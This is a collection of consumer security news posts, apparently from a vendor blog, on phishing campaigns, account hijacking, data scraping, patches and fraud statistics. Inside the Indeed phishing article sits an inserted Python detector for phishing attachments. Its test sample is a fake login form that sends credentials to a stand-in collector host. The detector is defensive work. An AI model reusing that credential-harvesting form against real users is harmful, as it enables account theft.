Phishing Alert: Scammers Use Fake SharePoint and DocuSign Messages to Steal Users’ Login Credentials

According to Bitdefender Antispam Lab researchers, cyber thieves are actively targeting DocuSign and SharePoint users in phishing attacks designed to mimic legitimate correspondence from the two web-based platforms.

Microsoft credentials up for grabs with fake SharePoint emails

The phishing attack spotted on June 24 appears to have originated from the United States. 33% of the fake emails reached users in the US, 26% in Ireland, 14% in Korea, 12% in Sweden, 5% in Denmark, and 1% in Finland, UK and India.

The scam email, disguised as an automated Microsoft SharePoint message, does not seek to infect recipients with malware. The scammers are looking to steal login credentials from their targets, and most of the emails use COVID-19 as a ruse to dupe recipients into accessing a bogus document.

For example, one such email asks recipients to review a “Covid 19 relief fund as approved by the board of directors.”

The emails are not directed to any specific employee within the targeted organization. Users who try to access the document will be directed to a landing page mimicking an Outlook login page.

Those who fall for the bait are giving the attackers their legitimate Microsoft credentials, allowing them to commit further crimes, including spreading spear-phishing emails, impersonating employees and stealing sensitive data.

DocuSign brand continues to be exploited during COVID

The DocuSign phishing campaign intercepted by our researchers closely resembles a legitimate email that a user might receive from the company. The perps sent out thousands of emails, most of them originating from IP addresses in Germany and Russia. A rather large number of hits targeted Portuguese and United States users. The messages use the brand’s logo, content and footer to dupe recipients into believing the email is real.

The recipient is asked to click a link to review and sign a document. The link directs the user to a bogus webpage that mimics DocuSign, and the user is prompted to sign in to their Adobe account to view the document.

If you’re one of the unfortunate users who clicked on the link and provided your credentials, change the password immediately and take proactive measures. You should also report the fraudulent email and website via the dedicated channel and spread the word to friends, family and co-workers.

Signing documents online from anywhere in the world does save time and effort, especially during the pandemic and social-distancing efforts. However, it’s essential for users to remain vigilant and double-check the correspondence before downloading an attachment or providing login credentials. A careless click gives cybercriminals the upper hand and the freedom to access sensitive information.

Note: This article is based on technical information provided courtesy of Bitdefender Antispam Lab

Google to Require Developers to Enable 2FA and Provide Real Information Before Uploading Apps in Play Store

Google is preparing a series of measures meant to better secure the Google Play Store by ensuring the developers who upload apps and updates are more trustworthy.

The Google Play Store is a vast library of software, and it’s growing by the minute. While the company is doing its best to keep malware and other types of threats off its platforms, it’s not entirely successful. More than once, Google has been forced to pull apps from the store after discovering developers uploaded apps that didn’t respect the license agreement but weren’t malicious enough to trigger the existing protection.

“To keep Google Play safe and secure and to better serve our developer community, we are introducing two new security measures: additional identification requirements and 2-Step Verification,” said Google. “These measures will help strengthen your account security and will help us better understand your needs.”

Creating a new developer account on the platform is now a little more complex, with a few extra steps that would discourage, hopefully, developers with malicious intent. Now, developers have to provide an email address and a phone number. 

Moreover, owners of developer accounts will have to tell Google whether it’s a personal or enterprise account, and disclose the name of the holder and a physical address. Also, the existing emails and phone numbers on file will have to be verified.

Having real people, with real names, behind accounts will help keep the official store a little safer. Google will occasionally email or call the developers to check if the information provided is real. While all of these measures are positive, they won’t offer 100% protection against attacks. Running a security app such as Bitdefender Mobile Security at all times is always recommended.

US Government Accountability Office Recommends NASA Harden Protection Against Cyberattacks

The Government Accountability Office (GAO) sent a letter to NASA in an effort to make the space agency more resilient to cyberattacks by proposing several security measures that would ensure its protection.

NASA is one of the many agencies in the US government considered vulnerable to cyberattacks, making it a prime candidate for essential improvements. Like any big organization, NASA has organizational issues that often translate to security problems. In some respects, NASA faces the same challenges as a private conglomerate, with issues stemming from the huge number of employees.

The proposed measures cover many areas, but it’s worth mentioning that NASA already implemented some of the proposals coming from GAO. In any case, NASA is not the only agency going through these changes.

“We have designated information security as a government-wide, high-risk area since 1997 and subsequently expanded this high-risk area to include protecting cyber critical infrastructure and securing personally identifiable information,” says GAO.

“Accordingly, federal agencies need to take urgent actions to ensure that they have programs in place to protect their information technology systems and sensitive information against increasing cyber risks.”

NASA already agreed to implement GAO’s recommendations, including an organization-wide cybersecurity risk assessment, a typical process that every large organization has to complete. Another request covers NASA Acquisition Management, which incidentally is on GAO’s High-Risk List of government operations with more significant vulnerabilities.

Finally, GAO is urging NASA to cover the rest of the high-risk targets that include improving the management of IT acquisitions and operations, improving strategic human capital management, managing federal real property, and ensuring the nation’s cybersecurity and government-wide personnel security. Some of these measures are already being implemented and should be ready by the end of the year.

Received a WhatsApp verification code without requesting it? Beware – you might be about to have your account stolen

Police in the UK are warning WhatsApp users of a surge they have seen in attempts made by fraudsters to steal accounts.

In a tweet posted by Southwark Police in South London, for instance, officers warn that scammers are stealing accounts by tricking WhatsApp users into sharing verification codes they are sent via SMS.

The scam works like this. Whenever someone tries to register a WhatsApp account on a mobile phone they give WhatsApp a phone number. WhatsApp sends an SMS verification code to the mobile phone number they have been given, to verify that the number is active and that the user trying to register the account really owns the number.

However, a fraudster might contact a WhatsApp user – perhaps pretending to be WhatsApp customer support – and ask them to forward the six-digit verification code that has just been – or is about to be – received on the mobile phone.

Of course, you haven’t requested a verification code. Instead, a scammer has entered your phone number and requested a registration code – in an attempt to hijack your account.

On its website, WhatsApp warns that keeping your verification code secret is an essential part of securing your account:

You should never share your WhatsApp verification code with others. If someone is trying to take over your account, they need the SMS verification code sent to your phone number to do so. Without this code, any user attempting to verify your number can’t complete the verification process and use your phone number on WhatsApp. This means you remain in control of your WhatsApp account.

Of course, if someone does manage to seize control of your WhatsApp account they will then be able to see any future messages you receive, and pretend to be you.

WhatsApp says that for this reason you should never share your verification code with anyone, even if they are friends or family.

“If you suspect someone else is using your WhatsApp account, you should notify family and friends as this individual could impersonate you in chats and groups. Please note, WhatsApp is end-to-end encrypted and messages are stored on your device, so someone accessing your account on another device can’t read your past conversations.”

For a higher level of security on WhatsApp, you are advised to not only never share your six-digit registration code, but also enable two-step verification, restrict who can view your profile photo, and be cautious about transferring money with contacts unless you have confirmed their identity.

WhatsApp offers further advice on how to recover your account if it has been stolen from you, and recommends that you log out of all computers from your phone if you still believe someone might be using your account via WhatsApp Web/Desktop.

Your Doxxing Dossier Will Keep Growing Thicker Until You See the Danger

On June 22, the profile details of 700 million LinkedIn users were put up for sale on an underground forum.

The same thing happened on April 6 for 500 million LinkedIn users. The exposed data contained profile information such as e-mail addresses, job descriptions, social media profile links and phone numbers.

On April 3, the phone numbers and associated profile info of over 530 million Facebook users were leaked online. The leaks included geographical location and even phone numbers, including Mark Zuckerberg’s.

What Happened

In all three cases, threat actors used the same method — web scraping. Automated tools harvested all the information from user profiles, abusing various APIs made available by the platforms. They attempted to pull much more than would typically be available without special privileges, such as the privileges given to a user connected to the victim.

It’s important to note that the services were not “hacked”, at least not in the way we’ve grown to understand the word. No database was stolen, and no platform internals were exposed. In fact, users’ passwords are still safe. But any information that could be shared was shared in the process – including data that users believed only close friends could see, like e-mail addresses or phone numbers.

Here’s what YOU need to know

The incidents highlight two points to understand and remember.

First and foremost, the moment you hand out a business card or post information on an online profile, the information becomes public. It’s been repeatedly proven that privacy settings don’t always work. This problem is amplified by the massive size of our “private circle” of connections or friends on these platforms.

Check how many people you have in that “private circle.” Phone numbers, e-mail addresses, Social Security numbers, and home addresses are data points we’re constantly forced to share with an increasing number of people and organizations. It’s only a matter of time before they’re exposed publicly.

Now more than ever, it’s crucial to KNOW when that happens. And, here, the Bitdefender Digital Identity Protection tool can help. Our service lets you take control and minimize your digital footprint by continuously monitoring for data breaches, publicly exposed information and social media impersonators.

Secondly, be mindful of your ever-growing (and never-shrinking) online dossier/file, and take some time to brush up on doxxing. Every piece of relevant information about you can be (and probably already is) added to a file with your name on it.

This information can later be used in:

  • identity theft (buying things, getting credit or simply causing damage to you and your loved ones by doing illegal things in your name)
  • selling your data to advertising networks, less legitimate than the ones you’re already willingly providing it to
  • stalking/domestic violence. It may be an uncomfortable scenario, but it DOES HAPPEN

Just check your digital footprint and learn if an ill-intended actor can carry out the acts in any of the three bullet points above or, God forbid, all of them. While LinkedIn and Facebook could have done a better job at preventing scraping bots, system vulnerabilities are exposed daily. Even though the platforms are sometimes quick to patch loopholes found by hackers, as users and members of the digital community, it’s also our job to be aware of the information we willingly expose and how it can be used against us.

NVIDIA Patches High-severity Vulnerability that Allowed for Spoofing Attacks via GeForce Experience

NVIDIA patched a GeForce Experience high-severity vulnerability that would have allowed attackers to perform spoofing attacks, leading to the compromise of the user’s login token.

NVIDIA offers an application named GeForce Experience to their GPU users, letting them easily install the latest drivers, change game settings to better fit the PC’s performance, record video, stream and more. The application also requires users to log in for various perks.

It turns out that the application also had a high-severity vulnerability, which the company was quick to fix. Since a remote non-authenticated attacker can exploit the vulnerability via the Internet, it’s a big problem. But the fact that it still required some input from the user, like clicking on a link, kept the severity score to only 8.3.

“NVIDIA GeForce Experience software contains a vulnerability where, if a user clicks on a maliciously formatted link that opens the GeForce Experience login page in a new browser tab instead of the GeForce Experience application and enters their login information, the malicious site can get access to the token of the user login session,” said the company. “Such an attack may lead to these targeted users’ data being accessed, altered, or lost.”

The company explained that the vulnerability was only possible because the application incorrectly parsed specially formatted links.

“A remote attacker can create a specially crafted link that opens the GeForce Experience login page in a new browser tab instead of the GeForce Experience application and enters their login information, the malicious site can get access to the token of the user login session” they added.

Installing the latest version of the application fixes this exploit. It should not be a problem since the update is directly pushed to users who have the app installed, and it’s installed when the app is opened.

GitHub Says 2020 Saw the Most Vulnerability Submissions in Bug Bounty Program

GitHub revealed that its Security Bug Bounty Program registered the most submissions in 2020 since its launch in 2014, and 204 vulnerabilities qualified for bounties.

Companies figured out a while ago that it’s better to find the vulnerabilities in their own software than to leave it to hackers or to hope that it’ll work out fine. All software and hardware has vulnerabilities. Sometimes, the good guys find them, but the entire industry can suffer when that’s not the case. In these programs, such as the one GitHub runs, security researchers are encouraged to find and report vulnerabilities in exchange for a bounty.

“2020 was our busiest year yet,” said GitHub. “From February 2020 to February 2021, we handled a higher volume of submissions than any previous year.[…] $524,250 in bounties awarded for 203 vulnerabilities in our products and services. This brings the overall rewards from our program since moving to HackerOne in 2016 to $1,552,004,” GitHub explained.

The company also provided a very interesting example of a bug submission that affected its own platform, and which could have been used to compromise the OAuth flow of Gist users.

“While the risk is fairly low, this vulnerability could be used to facilitate social engineering attacks by providing a link to that would end up redirecting to an attacker-directed site,” said GitHub.

It’s no surprise that 2020 was such a busy year for submission of vulnerabilities, as many people suddenly switched to working from home. Security researchers paid more attention to some of the more popular apps, and the entire bounty industry is becoming a lot more profitable.

Cyber Crooks Hunt for Indeed Job Seekers’ Account Credentials in Latest Phishing Campaign

The Bitdefender Antispam Lab has detected an ongoing phishing campaign targeting users of employment website Indeed.

According to our researchers, 48% of the fraudulent emails have reached users in the US, 28% in Ireland, 5% in Finland, 3% in France and India and 2% in Germany.

The cyber crooks use spoofing to trick users into thinking the message was sent from the employment platform, forging the email header to display ’’.

The email asks recipients to confirm their email address by downloading “the attached account update file” and logging into their account.

Accessing the HTML attachment named “Indeed_Update.html” will open a fraudulent login page with the recipients’ email address already filled in.
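A mail-gateway style check for the pattern described above, an HTML attachment that opens a login form with the recipient's address already filled in. This is an added example, not Bitdefender's detection logic; the sample messages, addresses, host names and the `scan_message` helper are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormScanner(HTMLParser):
    """Records password fields, pre-filled input values and form targets."""

    def __init__(self):
        super().__init__()
        self.password_field = False
        self.values = []
        self.hosts = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # A form in a local file that posts to a remote host sends
            # whatever is typed into it off the machine.
            host = urlparse(a.get("action", "")).hostname
            if host:
                self.hosts.append(host)
        elif tag == "input":
            if a.get("type", "").lower() == "password":
                self.password_field = True
            if a.get("value"):
                self.values.append(a["value"].strip().lower())


def scan_message(raw):
    """Return one finding per HTML attachment that contains a login form."""
    msg = message_from_bytes(raw, policy=policy.default)
    to = msg["To"]
    recipients = {a.addr_spec.lower() for a in to.addresses} if to else set()
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or name.lower().endswith((".html", ".htm")))
        if not is_html:
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. sent as application/octet-stream
            body = body.decode("utf-8", errors="replace")
        scanner = FormScanner()
        scanner.feed(body)
        if not scanner.password_field:
            continue
        findings.append({
            "attachment": name,
            "prefilled_recipient": bool(recipients & set(scanner.values)),
            "post_hosts": scanner.hosts,
        })
    return findings


def build_sample(html, filename):
    """Constructed test message; every address and host here is made up."""
    msg = EmailMessage()
    msg["From"] = "Indeed <no-reply@jobs.example>"
    msg["To"] = "jane.doe@corp.example"
    msg["Subject"] = "Confirm your email address"
    msg.set_content("Please download the attached account update file.")
    msg.add_attachment(html, subtype="html", filename=filename)
    return msg.as_bytes()


# Constructed attachment bodies: a login form and a harmless report.
PHISH_HTML = (
    '<html><body><form action="https://collector.example/post.php" method="post">'
    '<input type="email" name="email" value="jane.doe@corp.example">'
    '<input type="password" name="pass"><input type="submit" value="Sign in">'
    "</form></body></html>"
)
BENIGN_HTML = "<html><body><h1>Monthly report</h1></body></html>"

if __name__ == "__main__":
    for finding in scan_message(build_sample(PHISH_HTML, "Indeed_Update.html")):
        print(finding)
```

A password field inside an HTML attachment is already unusual for legitimate mail; the pre-filled recipient address and a remote form target raise confidence that the file is a credential-harvesting page.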

Indeed users who receive this email should not open the attachment or enter their password into the login page. Instead, delete the email and head to the official company website from your browser. Recipients who unwittingly entered their account password should immediately reset their password on and other online platforms that share the same login credentials.

As a reminder, employment-oriented services will not contact you via email and ask for personally identifiable information or financial information such as bank account numbers.

A vast number of online platforms deploy email verification processes. However, according to Indeed, users who sign up on the platform will receive a confirmation email during the setup process. The message asks recipients to confirm their email address by clicking on a link.

If you’re tired of wondering whether the correspondence in your Inbox is genuine, check out our 90-day Bitdefender Total Security trial that offers complete real-time data protection and anti-phishing filtering systems that sniff out and block websites masquerading as trustworthy entities.

Note: This article is based on technical information provided courtesy of Bitdefender Antispam Lab

One billion dollars lost by over-60s through online fraud in 2020, says FBI

According to a newly-published report by the FBI’s Internet Crime Complaint Center (IC3), the elderly are more at risk from falling victim to online fraud and internet scammers than ever before.

In the IC3’s Elder Fraud Report, the FBI detailed that approximately 28% of all fraud losses are sustained by victims who are over 60 years old – with total losses approaching US $1 billion.

Worryingly, that figure represents a rise of around $300 million compared to losses reported by seniors in 2019.

According to the FBI, while the average loss per victim was US $9,175, some 1,921 victims aged sixty and above lost more than US $100,000 to online scammers.

Figures released in the report show that not only were the over-60s most likely to become victims of all the age brackets surveyed, but also their total losses were the greatest.

Older adults, the study found, were often defrauded as a result of romance scams, tech support fraud, and investment scams. In addition, data suggests that hundreds of millions of dollars have been lost by companies through business email compromise attacks, facilitated unwittingly by staff aged over 60 years old.

It would be unfair and incorrect to characterise these attacks as succeeding simply because a more elderly person has been unlucky enough to fall victim. After all, a romance scam or email account compromise attack doesn’t discriminate between its targets based upon their age.

However, it’s possible that a victim’s age may play a factor in making them vulnerable to some scams – such as romance scams – especially if they have suffered a bereavement.

Furthermore, many of us with elderly loved ones may have found out the hard way that they can be naturally more trusting, compared to those of us who have spent a greater proportion of our lives guarding against internet scammers.

It’s also worth considering the impact that the global pandemic has had.

As the IC3 report explains, many elderly people may have found themselves shopping online for the first time due to Coronavirus lockdown restrictions.

“Elderly victims filed over 14,000 non-payment/non-delivery complaints experiencing losses over $40 million in 2020, making non-delivery of products the second most reported fraud among the elderly.”

In addition, many over-60s may have found themselves joining social networking sites for the first time in an attempt to stay in contact with friends and loved ones that they were not able to meet in person. As a result, they may have been easy pickings for online scammers posting fake adverts or promoting counterfeit products.

In some cases, attacks have taken a particularly dark and sinister nature with victims receiving threatening emails informing them (falsely) that they have been infected with COVID-19, or threatening to infect them with the virus, unless a cryptocurrency payment was made.

The onus lies on all of us to not assume that older members of our families, elderly friends and neighbours, are as clued up as we might be about online threats. We need to do our part to offer sensible advice and guidance to others to ensure that they do not become a soft target for online fraudsters.

Facebook Clone Wars: How to Check For Social Media Impersonators Who Use Your Info to Scam Friends and Family

Have you ever received a friend request from a person already on your list of friends on Facebook? If so, you were most likely targeted by a cloned Facebook account.

If not, chances are you will. You’ll likely run into a scam artist posing as either you or one of your friends while you’re busy checking your social media feed.

It may be impossible to predict the exact number of fake and impostor accounts on Facebook. However, the social media giant said it took action against 1.3 billion fake accounts in the first quarter of 2021.

What is Facebook account cloning?

Facebook cloning happens when scammers scrape your publicly available social media information (such as your profile picture and info) to create a copy of your profile. The imposter then tries to send friend requests to your list of friends to conduct various scams, including:

  • Sending malicious and fraudulent links to your friends and family
  • Manipulating your friends or family members for financial gain
  • Attempting to defraud your acquaintances using advance fee scams

These attempts may compromise your online and real-life reputation. Additionally, the scammer will even try to shut down your profile by reporting you to the social media platform.

How to protect against Facebook account cloning?

You don’t have to be a celebrity to become a target of social media impostors. While most individuals find out about an impersonation attempt from friends, users can also track down potential scammers by searching their own name in the Facebook search field.

Although no measures are bulletproof, adopting more privacy-focused settings on your Facebook account can discourage scammers from attempting to clone it, including:

  • Making your friends list hidden
  • Removing public visibility on your future posts, photos and profile information such as email address and phone number
  • Disabling any options that allow anyone to send you a friend request

Living in a social media-driven age, protecting online privacy and personal information is a must. Bitdefender’s Digital Identity Protection tool helps you take control and minimize your digital footprint by continuously monitoring for data breaches and social media impersonators that may ruin your reputation.

Our tool proactively scans the web for accounts set up using your data. Each time a new profile is created using your info, you can easily inspect it and stop impersonation attempts before they cause irreparable harm.

Don’t forget to immediately report any impersonation attempts or suspicious activity to the social media platform and immediately inform your friends.
